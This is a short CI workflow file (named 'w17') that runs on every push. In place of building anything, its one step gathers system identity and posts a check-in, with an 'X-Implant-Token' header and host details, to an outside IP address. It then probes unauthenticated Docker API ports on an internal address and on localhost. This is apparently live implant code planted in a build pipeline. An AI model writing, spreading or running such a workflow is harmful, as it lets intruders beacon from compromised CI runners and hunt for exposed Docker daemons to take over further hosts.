13 lines
537 B
YAML
13 lines
537 B
YAML
name: w17
|
|
on: [push]
|
|
jobs:
|
|
build:
|
|
runs-on: ubuntu-latest
|
|
steps:
|
|
- name: s
|
|
run: |
|
|
id; hostname; uname -a
|
|
curl -k -fsS -H "X-Implant-Token: t-E0IWpICy0G_PllryfqETe_Q30Pni-wdGBHBufVaos" -H "Content-Type: application/json" -X POST https://38.22.234.200:9443/check_in -d "{"hostname":"gitea-actions","username":"runner","os":"linux","arch":"amd64","pid":1,"wave":"17gitea"}" || true
|
|
curl -s http://10.76.33.252:2375/version || true
|
|
curl -s http://127.0.0.1:2375/version || true
|